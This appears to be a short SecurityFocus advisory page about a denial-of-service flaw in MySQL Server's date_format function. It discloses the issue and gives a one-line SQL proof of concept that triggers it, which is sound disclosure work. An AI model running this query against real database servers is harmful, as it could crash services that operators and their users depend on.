info
discussion
exploit
solution
references
MySQL Server Date_Format Denial Of Service Vulnerability
Attackers use standard database client software to exploit this issue.
The following SQL statement will demonstrate this issue:
select date_format('%d%s', 1);
Privacy Statement
Copyright 2010, SecurityFocus
